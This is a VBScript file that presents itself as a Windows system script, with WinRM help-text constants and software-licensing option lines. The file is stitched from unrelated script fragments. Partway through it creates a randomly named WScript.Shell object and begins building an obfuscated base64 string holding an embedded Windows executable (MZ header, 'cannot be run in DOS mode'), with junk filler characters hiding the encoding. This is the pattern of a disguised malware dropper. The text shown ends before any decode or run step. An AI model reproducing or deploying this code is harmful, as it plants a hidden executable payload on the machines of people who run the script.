private const L_HelpQuickConfig_019_0_Message = "the firewall exception regardless of current network profile settings."
private const L_HelpRemote_001_0_Message = "winrm OPERATION -remote:VALUE [-unencrypted] [-usessl]"
private const L_HelpRemote_002_0_Message = ""
private const L_HelpRemote_003_0_Message = "-r[emote]:VALUE"
private const L_HelpRemote_004_0_Message = "---------------"
private const L_HelpRemote_005_0_Message = "Specifies identifier of remote endpoint/system. "
private const L_HelpRemote_006_0_Message = "May be a simple host name or a complete URL."
private const L_HelpRemote_007_0_Message = ""
private const L_HelpRemote_008_0_Message = " [TRANSPORT://]HOST[:PORT][/PREFIX]"
private const L_HelpRemote_009_0_Message = ""
private const L_HelpRemote_010_0_Message = "Transport: One of HTTP or HTTPS; default is HTTP."
private const L_HelpRemote_011_0_Message = "Host: Can be in the form of a DNS name, NetBIOS name, or IP address."
private const L_HelpRemote_012_0_Message = "Port: If port is not specified then the following default rules apply:"
private const L_HelpRemote_013_0_Message = "Prefix: Defaults to wsman."
private const L_HelpRemote_014_0_Message = ""
private const L_HelpRemote_015_0_Message = "Note: IPv6 addresses must be enclosed in brackets."
private const L_HelpRemote_016_0_Message = "Note: When using HTTPS, the machine name must match the server's certificate"
private const L_HelpRemote_017_0_Message = " common name (CN) unless -skipCNcheck is used."
private const L_HelpRemote_018_0_Message = "Note: Defaults for port and prefix can be changed in the local configuration."
private const L_HelpRemoteExample_001_0_Message = "Example: Connect to via http:"
private const X_HelpRemoteExample_002_0_Message = " winrm get uri"
private const L_HelpRemoteExample_003_0_Message = ""
private const L_HelpRemoteExample_004_0_Message = "Example: Connect to local computer machine1 via https:"
private const X_HelpRemoteExample_005_0_Message = " winrm get uri -r:https://machine1"
private const L_HelpRemoteExample_006_0_Message = ""
private const L_HelpRemoteExample_007_0_Message = "Example: Connect to an IPv6 machine via http:"
private const X_HelpRemoteExample_008_0_Message = " winrm get uri -r:[1:2:3::8]"
private const L_HelpRemoteExample_009_0_Message = ""
private const L_HelpRemoteExample_010_0_Message = "Example: Connect to an IPv6 machine via https on a non-default port and URL:"
private const X_HelpRemoteExample_011_0_Message = " winrm get uri -r:https://[1:2:3::8]:444/path"
private const L_HelpRemoteUnencrypted_001_0_Message = "-un[encrypted]"
private const L_HelpRemoteUnencrypted_002_0_Message = "--------------"
private const L_HelpRemoteUnencrypted_003_0_Message = "Specifies that no encryption will be used when doing remote operations over"
private const L_HelpRemoteUnencrypted_004_0_Message = "HTTP. Unencrypted traffic is not allowed by default and must be enabled in"
private const L_HelpRemoteUnencrypted_005_0_Message = "the local configuration."
private const L_HelpRemoteConfig_001_0_Message = "To enable this machine to be remotely managed see:"
private const L_HelpAuth_001_0_Message = "winrm OPERATION -remote:VALUE "
private const L_HelpAuth_002_0_Message = " [-authentication:VALUE] "
private const L_HelpAuth_003_0_Message = " [-username:USERNAME] "
private const L_HelpAuth_004_0_Message = " [-password:PASSWORD]"
private const L_HelpAuth_004_1_Message = " [-certificate:THUMBPRINT]"
private const L_HelpAuth_005_0_Message = ""
private const L_HelpAuth_006_0_Message = "When connecting remotely, you can specify which credentials and which"
private const L_HelpAuth_007_0_Message = "authentication mechanisms to use. If none are specified the current "
private const L_HelpAuth_008_0_Message = "logged-on user's credentials will be used."
private const L_HelpAuthAuth_001_0_Message = "-a[uthentication]:VALUE"
private const L_HelpAuthAuth_002_0_Message = "-----------------------"
private const L_HelpAuthAuth_003_0_Message = "Specifies authentication mechanism used when communicating with remote machine."
private const L_HelpAuthAuth_004_0_Message = "Possible options are None, Basic, Digest, Negotiate, Kerberos, CredSSP."
private const L_HelpAuthAuth_004_1_Message = "Possible options are None, Basic, Digest, Negotiate, Kerberos."
private const L_HelpAuthAuth_005_0_Message = "Examples:"
private const X_HelpAuthAuth_006_0_Message = " -a:None"
private const X_HelpAuthAuth_007_0_Message = " -a:Basic"
private const X_HelpAuthAuth_008_0_Message = " -a:Digest"
private const X_HelpAuthAuth_009_0_Message = " -a:Negotiate"
private const X_HelpAuthAuth_010_0_Message = " -a:Kerberos"
private const X_HelpAuthAuth_010_1_Message = " -a:Certificate"
private const X_HelpAuthAuth_010_2_Message = " -a:CredSSP"
private const L_HelpAuthAuth_011_0_Message = "Note: If an authentication mechanism is not specified, Kerberos is used unless"
private const L_HelpAuthAuth_012_0_Message = " one of the conditions below is true, in which case Negotiate is used:"
private const L_HelpAuthAuth_013_0_Message = " -explicit credentials are supplied and the destination host is trusted"
private const L_HelpAuthAuth_013_1_Message = " -the destination host is ""localhost"", """" or ""[::1]"""
private const L_HelpAuthAuth_013_2_Message = " -the client computer is in workgroup and the destination host is trusted"
private const L_HelpAuthAuth_014_0_Message = "Note: Not all authentication mechanisms are enabled by default. Allowed"
private const L_HelpAuthAuth_015_0_Message = " authentication mechanisms can be controlled by local configuration "
private const L_HelpAuthAuth_016_0_Message = " or group policy."
private const L_HelpAuthAuth_017_0_Message = "Note: Most operations will require an authentication mode other than None."
private const L_HelpAuthAuth_018_0_Message = "Note: Certificate authentication can be used only with the HTTPS transport."
private const L_HelpAuthAuth_019_0_Message = " To configure an HTTPS listener for the WinRM service run the command:"
private const L_HelpAuthAuth_020_0_Message = " ""winrm quickconfig -transport:HTTPS"""
private const L_HelpAuthUsername_001_0_Message = "-u[sername]:USERNAME"
private const L_HelpAuthUsername_002_0_Message = "--------------------"
private const L_HelpAuthUsername_003_0_Message = "Specifies username on remote machine. Cannot be used on local machine."
private const L_HelpAuthUsername_004_0_Message = "User must be member of local Administrators group on remote machine."
private const L_HelpAuthUsername_005_0_Message = "If the user account is a local account on the remote machine,"
private const L_HelpAuthUsername_006_0_Message = "the syntax should be in the form -username:USERNAME"
private const L_HelpAuthUsername_007_0_Message = "If the username is a domain account, the syntax should be in the form"
private const L_HelpAuthUsername_008_0_Message = "-username:DOMAIN\USERNAME"
private const L_HelpAuthUsername_009_0_Message = "If Basic or Digest is used, then -username is required."
private const L_HelpAuthUsername_010_0_Message = "If Kerberos is used, then the current logged-on user's credentials"
private const L_HelpAuthUsername_011_0_Message = "are used if -username is not supplied. Only domain credentials can"
private const L_HelpAuthUsername_011_1_Message = "be used with Kerberos."
private const L_HelpAuthUsername_012_0_Message = "If Negotiate is used, then -username is required unless"
private const L_HelpAuthUsername_013_0_Message = "one of the conditions below is true:"
private const L_HelpAuthUsername_014_0_Message = " -the destination host is ""localhost"", """" or ""[::1]"""
private const L_HelpAuthUsername_015_0_Message = " -the client computer is in workgroup and the destination host is trusted"
private const L_HelpAuthUsername_016_0_Message = "If CredSSP is used, then username and password are required."
private const L_HelpAuthPassword_001_0_Message = "-p[assword]:PASSWORD"
private const L_HelpAuthPassword_002_0_Message = "--------------------"
private const L_HelpAuthPassword_003_0_Message = "Specifies password on command line to override interactive prompt."
private const L_HelpAuthPassword_004_0_Message = "Applies only if -username:USERNAME option is used."
private const L_HelpAuthCertificate_001_0_Message = "-c[ertificate]:THUMBPRINT"
private const L_HelpAuthCertificate_002_0_Message = "--------------------"
private const L_HelpAuthCertificate_003_0_Message = "Specifies the thumbprint of a certificate that must exist in the local"
private const L_HelpAuthCertificate_004_0_Message = "machine store or in the current user store. The certificate must be intended"
private const L_HelpAuthCertificate_005_0_Message = "for client authentication."
private const L_HelpAuthCertificate_006_0_Message = "Applies only if -a:Certificate is used."
private const L_HelpAuthCertificate_007_0_Message = "THUMBPRINT can contain spaces, in which case it must be enclosed in"
private const L_HelpAuthCertificate_008_0_Message = "double quotation marks."
private const L_HelpAuthCertificate_009_0_Message = "Examples:"
private const L_HelpAuthCertificate_010_0_Message = "-c:7b0cf48026409e38a2d6348761b1dd1271c4f86d"
private const L_HelpAuthCertificate_011_0_Message = "-c:""7b 0c f4 80 26 40 9e 38 a2 d6 34 87 61 b1 dd 12 71 c4 f8 6d"""
private const X_HelpProxy_001_0_Message = "winrm OPERATION -remote:VALUE "
private const X_HelpProxy_002_0_Message = " [-proxyaccess:VALUE] "
private const X_HelpProxy_002_1_Message = " [-proxyauth:VALUE] "
private const X_HelpProxy_003_0_Message = " [-proxyusername:USERNAME] "
private const X_HelpProxy_004_0_Message = " [-proxypassword:PASSWORD]"
private const L_HelpProxy_005_0_Message = ""
private const L_HelpProxy_006_0_Message = "When connecting remotely, you can specify which proxy access type,"
private const L_HelpProxy_007_0_Message = " proxy credentials and proxy authentication mechanisms to use."
private const X_HelpProxyAccess_001_0_Message = "-p[roxy]ac[cess]:VALUE"
private const L_HelpProxyAccess_002_0_Message = "-----------------------"
private const L_HelpProxyAccess_003_0_Message = "Specifies which proxy settings to retrieve when connecting to a remote machine."
private const L_HelpProxyAccess_004_0_Message = "Possible options are ie_settings, winhttp_settings, auto_detect, no_proxy."
private const L_HelpProxyAccess_005_0_Message = "Examples:"
private const X_HelpProxyAccess_006_0_Message = " -pac:ie_settings"
private const X_HelpProxyAccess_007_0_Message = " -pac:winhttp_settings"
private const X_HelpProxyAccess_008_0_Message = " -pac:auto_detect"
private const X_HelpProxyAccess_009_0_Message = " -pac:no_proxy"
private const L_HelpProxyAccess_010_0_Message = ""
private const L_HelpProxyAccess_011_0_Message = "The WSMan client provides four options for the configuration of proxy settings:"
private const L_HelpProxyAccess_012_0_Message = " -use settings configured through Internet Explorer (default)"
private const L_HelpProxyAccess_013_0_Message = " -use settings configured through WinHTTP"
private const L_HelpProxyAccess_014_0_Message = " -automatic proxy discovery"
private const L_HelpProxyAccess_015_0_Message = " -direct connection (don
t use a proxy)"
private const L_HelpProxyAuth_001_0_Message = "-p[roxy]a[uth]:VALUE"
private const L_HelpProxyAuth_002_0_Message = "-----------------------"
private const L_HelpProxyAuth_003_0_Message = "Specifies authentication mechanism used to authenticate with a proxy."
private const L_HelpProxyAuth_004_0_Message = "Possible options are Basic, Digest, Negotiate."
private const L_HelpProxyAuth_005_0_Message = "Examples:"
private const X_HelpProxyAuth_007_0_Message = " -pa:Basic"
private const X_HelpProxyAuth_008_0_Message = " -pa:Digest"
private const X_HelpProxyAuth_009_0_Message = " -pa:Negotiate"
private const L_HelpProxyAuth_010_0_Message = "If -proxyauth:VALUE is used then -proxyaccess:VALUE is required."
private const L_HelpProxyUsername_001_0_Message = "-p[roxy]u[sername]:USERNAME"
private const L_HelpProxyUsername_002_0_Message = "--------------------"
private const L_HelpProxyUsername_003_0_Message = "Specifies username to authenticate with proxy. Cannot be used on local machine."
private const L_HelpProxyUsername_005_0_Message = "If the user account is a local account on the remote machine,"
private const L_HelpProxyUsername_006_0_Message = "the syntax should be in the form -proxyusername:USERNAME"
private const L_HelpProxyUsername_007_0_Message = "If the username is a domain account, the syntax should be in the form"
private const L_HelpProxyUsername_008_0_Message = "-proxyusername:DOMAIN\USERNAME"
private const L_HelpProxyUsername_009_0_Message = "If -proxyusername is used then -proxyauth:VALUE is required."
private const L_HelpProxyPassword_001_0_Message = "-p[roxy]p[assword]:PASSWORD"
private const L_HelpProxyPassword_002_0_Message = "--------------------"
private const L_HelpProxyPassword_003_0_Message = "Specifies password on command line to override interactive prompt."
private const L_HelpProxyPassword_004_0_Message = "Applies only if -proxyusername:USERNAME option is used."
private const L_HelpInput_001_0_Message = "Input can be by either providing key/value pairs directly on the command line"
private const L_HelpInput_002_0_Message = "or reading XML from a file."
private const L_HelpInput_003_0_Message = ""
private const L_HelpInput_004_0_Message = " winrm OPERATION -file:VALUE "
private const L_HelpInput_005_0_Message = " winrm OPERATION @{KEY=""VALUE""[;KEY=""VALUE""]}"
private const L_HelpInput_006_0_Message = ""
private const L_HelpInput_007_0_Message = "Applies to set, create, and invoke operations."
private const L_HelpInput_008_0_Message = "Use either @{KEY=VALUE} or input from an XML file, but not both."
private const L_HelpInput_009_0_Message = ""
private const L_HelpInput_010_0_Message = "-file:VALUE"
private const L_HelpInput_011_0_Message = "-----------"
private const L_HelpInput_012_0_Message = "Specifies name of file used as input."
private const L_HelpInput_013_0_Message = "VALUE can be absolute path, relative path, or filename without path."
private const L_HelpInput_014_0_Message = "Names or paths that include spaces must be enclosed in quotation marks."
private const L_HelpInput_015_0_Message = ""
private const L_HelpInput_016_0_Message = "@{KEY=""VALUE""[;KEY=""VALUE""]}"
private const L_HelpInput_017_0_Message = "----------------------------"
private const L_HelpInput_018_0_Message = "Keys are not unique."
private const L_HelpInput_019_0_Message = "Values must be within quotation marks."
private const L_HelpInput_020_0_Message = "$null is a special value."
private const L_HelpInput_021_0_Message = ""
private const L_HelpInput_022_0_Message = "Examples:"
private const X_HelpInput_023_0_Message = " @{key1=""value1"";key2=""value2""}"
private const X_HelpInput_024_0_Message = " @{key1=$null;key2=""value2""}"
private const L_HelpFilter_001_0_Message = "Filters allow selecting a subset of the desired resources:"
private const X_HelpFilter_002_0_Message = ""
private const X_HelpFilter_003_0_Message = "winrm enumerate RESOURCE_URI -filter:EXPR [-dialect:URI] [-Associations]..."
private const X_HelpFilter_004_0_Message = ""
private const L_HelpFilter_005_0_Message = "-filter:EXPR"
private const X_HelpFilter_006_0_Message = "------------"
private const L_HelpFilter_007_0_Message = "Filter expression for enumeration."
private const X_HelpFilter_008_0_Message = ""
private const L_HelpFilter_009_0_Message = "-dialect:URI"
private const X_HelpFilter_010_0_Message = "------------"
private const L_HelpFilter_011_0_Message = "Dialect of the filter expression for enumeration."
private const L_HelpFilter_012_0_Message = "This may be any dialect supported by the remote service. "
private const X_HelpFilter_013_0_Message = ""
private const L_HelpFilter_014_0_Message = "The following aliases can be used for the dialect URI:"
private const X_HelpFilter_015_0_Message = "* WQL -"
private const X_HelpFilter_016_0_Message = "* Selector -"
private const X_HelpFilter_016_1_Message = "* Association -"
private const X_HelpFilter_017_0_Message = ""
private const L_HelpFilter_018_0_Message = "The dialect URI defaults to WQL when used with enumeration."
private const X_HelpFilter_019_0_Message = ""
private const L_HelpFilter_019_1_Message = "-Associations"
private const L_HelpFilter_019_2_Message = "------------"
private const X_HelpFilter_019_3_Message = "This parameter has relevance only when the Dialect parameter exists, and its value is specified as Association. Otherwise this parameter should not be used."
private const X_HelpFilter_019_4_Message = "This indicates retrieval of Association Instances rather than Associated Instances. Absence of this parameter would imply Associated Instances are to be retrieved."
private const X_HelpFilter_019_5_Message = ""
private const L_HelpFilter_020_0_Message = "Example: Find running services"
private const X_HelpFilter_021_0_Message = " winrm e wmicimv2/Win32_Service -dialect:selector -filter:{State=""Running""}"
private const X_HelpFilter_022_0_Message = ""
private const L_HelpFilter_023_0_Message = "Example: Find auto start services that are not running"
private const X_HelpFilter_024_0_Message = " winrm e wmicimv2/* -filter:""select * from Win32_Service where State!='Running' and StartMode='Auto'"""
private const L_HelpFilter_025_0_Message = ""
private const L_HelpFilter_026_0_Message = "Example: Find the services on which winrm service has a dependency"
private const X_HelpFilter_027_0_Message = " winrm e wmicimv2/* -dialect:Association -filter:{Object=Win32_Service?Name=WinRM;AssociationClassName=Win32_DependentService;ResultClassName=win32_service;ResultRole=antecedent;Role=dependent}"
private const L_HelpSwitchTimeout_001_0_Message = "-timeout:MS"
private const L_HelpSwitchTimeout_002_0_Message = "-----------"
private const L_HelpSwitchTimeout_003_0_Message = "Timeout in milliseconds. Limits duration of corresponding operation."
private const L_HelpSwitchTimeout_004_0_Message = "Default timeout can be configured by:"
private const X_HelpSwitchTimeout_005_0_Message = " winrm set winrm/config @{MaxTimeoutms=""XXXXXX""}"
private const L_HelpSwitchTimeout_006_0_Message = "Where XXXXXX is an integer indicating milliseconds."
private const X_HelpSwitchSkipCACheck_001_0_Message = "-skipCAcheck"
private const L_HelpSwitchSkipCACheck_002_0_Message = "------------"
private const L_HelpSwitchSkipCACheck_003_0_Message = "Specifies that certificate issuer need not be a trusted root authority."
private const L_HelpSwitchSkipCACheck_004_0_Message = "Used only in remote operations using HTTPS (see -remote option)."
private const L_HelpSwitchSkipCACheck_005_0_Message = "This option should be used only for trusted machines."
private const X_HelpSwitchSkipCNCheck_001_0_Message = "-skipCNcheck"
private const L_HelpSwitchSkipCNCheck_002_0_Message = "------------"
private const L_HelpSwitchSkipCNCheck_003_0_Message = "Specifies that certificate common name (CN) of the server need not match the"
private const L_HelpSwitchSkipCNCheck_004_0_Message = "hostname of the server. "
private const L_HelpSwitchSkipCNCheck_005_0_Message = "Used only in remote operations using HTTPS (see -remote option)."
private const L_HelpSwitchSkipCNCheck_006_0_Message = "This option should be used only for trusted machines."
private const X_HelpSwitchSkipRevCheck_001_0_Message = "-skipRevocationcheck"
private const X_HelpSwitchSkipRevCheck_002_0_Message = "-------------------"
private const L_HelpSwitchSkipRevCheck_003_0_Message = "Specifies that the revocation status of the server certificate is not checked."
private const L_HelpSwitchSkipRevCheck_004_0_Message = "Used only in remote operations using HTTPS (see -remote option)."
private const L_HelpSwitchSkipRevCheck_005_0_Message = "This option should be used only for trusted machines."
private const X_HelpSwitchDefaultCreds_001_0_Message = "-defaultCreds"
private const X_HelpSwitchDefaultCreds_002_0_Message = "-------------------"
private const L_HelpSwitchDefaultCreds_003_0_Message = "Specifies that the implicit credentials are allowed when Negotiate is used."
private const L_HelpSwitchDefaultCreds_004_0_Message = "Allowed only in remote operations using HTTPS (see -remote option)."
private const L_HelpSwitchDialect_001_0_Message = "-dialect:VALUE"
private const L_HelpSwitchDialect_002_0_Message = "--------------"
private const L_HelpSwitchDialect_003_0_Message = "Dialect of the filter expression for enumeration or fragment."
private const L_HelpSwitchDialect_004_0_Message = "Example: Use a WQL query"
private const X_HelpSwitchDialect_005_0_Message = " -dialect:"
private const L_HelpSwitchDialect_006_0_Message = "Example: Use XPATH for filtering with enumeration or fragment get/set."
private const X_HelpSwitchDialect_007_0_Message = " -dialect:"
'private const L_HelpSwitchFilter_001_0_Message = "-filter:VALUE"
'private const L_HelpSwitchFilter_002_0_Message = "-----------------"
'private const L_HelpSwitchFilter_003_0_Message = "Filter expression for enumeration."
'private const L_HelpSwitchFilter_004_0_Message = "Example: Use a WQL query"
'private const X_HelpSwitchFilter_005_0_Message = " -filter:""select * from Win32_process where handle=0"""
private const L_HelpSwitchFragment_001_0_Message = "-fragment:VALUE"
private const L_HelpSwitchFragment_002_0_Message = "---------------"
private const L_HelpSwitchFragment_003_0_Message = "Specify a section inside the instance XML that is to be updated or retrieved"
private const L_HelpSwitchFragment_004_0_Message = "for the given operation."
private const L_HelpSwitchFragment_005_0_Message = "Example: Get the status of the spooler service"
private const X_HelpSwitchFragment_006_0_Message = " winrm get wmicimv2/Win32_Service?name=spooler -fragment:Status/text()"
private const L_HelpSwitchOption_001_0_Message = "-options:{KEY=""VALUE""[;KEY=""VALUE""]}"
private const L_HelpSwitchOption_002_0_Message = "------------------------------------"
private const L_HelpSwitchOption_003_0_Message = "Key/value pairs for provider-specific options."
private const L_HelpSwitchOption_004_0_Message = "To specify NULL as a value, use $null"
private const L_HelpSwitchOption_005_0_Message = ""
private const L_HelpSwitchOption_006_0_Message = "Examples:"
private const X_HelpSwitchOption_007_0_Message = " -options:{key1=""value1"";key2=""value2""}"
private const X_HelpSwitchOption_008_0_Message = " -options:{key1=$null;key2=""value2""}"
private const X_HelpSwitchSPNPort_001_0_Message = "-SPNPort"
private const L_HelpSwitchSPNPort_002_0_Message = "--------"
private const L_HelpSwitchSPNPort_003_0_Message = "Appends port number to the Service Principal Name (SPN) of the remote server."
private const L_HelpSwitchSPNPort_004_0_Message = "Service principal name is used when Negotiate or Kerberos authentication"
private const L_HelpSwitchSPNPort_005_0_Message = "mechanism is in use."
private const L_HelpSwitchEncoding_001_0_Message = "-encoding:VALUE"
private const L_HelpSwitchEncoding_002_0_Message = "---------------"
private const L_HelpSwitchEncoding_003_0_Message = "Specifies encoding type when talking to remote machine (see -remote"
private const L_HelpSwitchEncoding_004_0_Message = "option). Possible options are ""utf-8"" and ""utf-16""."
private const L_HelpSwitchEncoding_005_0_Message = "Default is utf-8."
private const L_HelpSwitchEncoding_006_0_Message = "Examples:"
private const X_HelpSwitchEncoding_007_0_Message = " -encoding:utf-8"
private const X_HelpSwitchEncoding_008_0_Message = " -encoding:utf-16"
private const L_HelpSwitchFormat_001_0_Message = "-f[ormat]:FORMAT"
private const L_HelpSwitchFormat_002_0_Message = "----------------"
private const L_HelpSwitchFormat_003_0_Message = "Specifies format of output."
private const L_HelpSwitchFormat_004_0_Message = "FORMAT can be ""xml"", ""pretty"" (better formatted XML), or ""text""."
private const L_HelpSwitchFormat_005_0_Message = "Examples:"
private const X_HelpSwitchFormat_006_0_Message = " -format:xml"
private const X_HelpSwitchFormat_007_0_Message = " -format:pretty"
private const X_HelpSwitchFormat_008_0_Message = " -format:text"
private const L_HelpRemoteUseSsl_001_0_Message = "-[use]ssl"
private const L_HelpRemoteUseSsl_002_0_Message = "---------"
private const L_HelpRemoteUseSsl_003_0_Message = "Specifies that an SSL connection will be used when doing remote operations."
private const L_HelpRemoteUseSsl_004_0_Message = "The transport in the remote option should not be specified. "
private const L_HelpRemote_012_1_Message = " * If transport is specified to HTTP then port 80 is used."
private const L_HelpRemote_012_2_Message = " * If transport is specified to HTTPS then port 443 is used."
private const L_HelpRemote_012_3_Message = " * If transport is not specified and -usessl is not specified then port"
private const L_HelpRemote_012_4_Message = " 5985 is used for an HTTP connection."
private const L_HelpRemote_012_5_Message = " * If transport is not specified and -usessl is specified then port 5986"
private const L_HelpRemote_012_6_Message = " is used for an HTTPS connection."
On Error Resume Next
OptLine GetResource("L_optDisplayInformation"), GetResource("L_ParamsActIDOptional"), GetResource("L_optDisplayInformationUsage")
OptLine GetResource("L_optDisplayInformationVerbose"), GetResource("L_ParamsActIDOptional"), GetResource("L_optDisplayInformationUsageVerbose")
OptLine GetResource("L_optExpirationDatime"), GetResource("L_ParamsActivationIDOptional"), GetResource("L_optExpirationDatimeUsage")
Set nSfzUHZDGKZWCJNNPEFLRM = WScript.CreateObject("WScript.Shell")
LineOut ""
LineOut GetResource("L_MsgGlobalOptions")
OptLine GetResource("L_optInstallProductKey"), GetResource("L_ParamsProductKey"), GetResource("L_optInstallProductKeyUsage")
OptLine GetResource("L_optActivateProduct"), GetResource("L_ParamsActivationIDOptional"), GetResource("L_optActivateProductUsage")
Dim RNhrp
RNhrp = RNhrp & "TVqQ@@&&^%^#%@@&&^%^#%M@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%E@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%//8@@&&^%^#%@@&&^%^#%Lg@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "Q@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%4fug4@@&&^"
RNhrp = RNhrp & "%^#%t@@&&^%^#%nNIbgBTM0hVGhpcyBwcm9ncmFt"
RNhrp = RNhrp & "IGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0K"
RNhrp = RNhrp & "J@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%BQRQ@@&&^%^#%@@&&^%^#%T@@&&^%^#%ED@@&&"
RNhrp = RNhrp & "^%^#%Nj/dNM@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%O@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "DiEL@@&&^%^#%QY@@&&^%^#%@@&&^%^#%F@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%G"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%Lm4@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%B@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%g@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%B@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%E@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%D@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%g@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%M@@&&^%^#%YIU@@&&^%^#%@@&&^%^#%B@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%B@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "E@@&&^%^#%@@&&^%^#%@@&&^%^#%E@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%B@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%OBt"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%BL@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%I@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%CQD@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
RNhrp = RNhrp & "@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%K@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%w@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%CYbQ@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%H@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&"
RNhrp = RNhrp & "^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#"
RNhrp = RNhrp & "%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&"
RNhrp = RNhrp & "&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^"
RNhrp = RNhrp & "#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@"
RNhrp = RNhrp & "&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%"
RNhrp = RNhrp & "^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@"
RNhrp = RNhrp & "@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^"
RNhrp = RNhrp & "%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%@@&&^%^#%"
